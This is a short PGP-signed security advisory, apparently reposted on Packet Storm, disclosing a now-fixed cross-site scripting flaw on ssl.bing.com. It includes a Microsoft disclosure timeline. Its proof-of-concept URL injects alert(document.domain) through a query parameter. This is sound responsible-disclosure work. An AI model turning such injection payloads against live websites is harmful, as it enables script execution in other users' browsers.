ssl.bing.com suffered from a cross site scripting vulnerability.
37d160ce1d252a3d686efc9a22c7753044cf3ac7a500c95dae704ffd2fc6b168
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: ssl.bing.com - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-012
Author: Stefan Schurtz
Affected Software: Successfully tested on ssl.bing.com
Vendor URL: http://www.microsoft.com
Vendor Status: fixed
==========================
Vulnerability Description
==========================
The website 'ssl.bing.com' is prone to a Cross-site Scripting vulnerability
==========================
PoC-Exploit
==========================
https://ssl.bing.com/webmaster/home/mysites?orde=1&url=http%3A%2F%2Fstefanschurtz.de%2Ff5018%27-alert%28document.domain%29-%27207aac89df6
==========================
Disclosure Timeline
==========================
29-Dec-2013 - informed Microsoft Security Response Center
30-Dec-2013 - feedback from Microsoft Security Response Center
31-Dec-2013 - status update from Microsoft Security Response Center
03-Jan-2014 - status update from Microsoft Security Response Center
24-Jan-2014 - informed from MSRC about fix
==========================
Credits
==========================
Vulnerability found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://www.microsoft.com/
http://www.darksecurity.de/advisories/2013/SSCHADV2013-012.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlLjrWkACgkQg3svV2LcbMBQZgCfV+hU5m/M9+K18dBuVw8JC2mF
T6QAni+zUWH7UO+mRnyB1mSb0l5Jkhc2
=87yA
-----END PGP SIGNATURE-----
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed